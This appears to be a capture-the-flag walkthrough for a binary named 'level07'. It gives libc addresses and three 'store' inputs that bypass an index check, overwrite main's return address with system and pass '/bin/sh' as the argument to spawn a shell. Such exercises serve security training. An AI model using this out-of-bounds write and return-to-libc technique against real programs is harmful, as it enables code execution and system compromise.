/bin/sh : 0xf7f897ec (4160264172)
system : 0xf7e6aed0 (4159090384)

Start by adding 2 variables in environment

$ export COLUMNS=118
$ export LINES=75

Then launch program like this :

$ ./level07 'x' 'x'

The idea is to skip error check in store_number so we can write anywhere we want.
Then rewrite the main return address with a call to system.

>> Overwrite error check
    Input command: store
        Number: 134514370
        Index: -1040108876

>> Change main return value by a call to system
    Input command: store
        Number: 4159090384
        Index: 114

>> Change [ebp+8] by "/bin/sh"
    Input command: store
        Number: 4160264172
        Index: 116
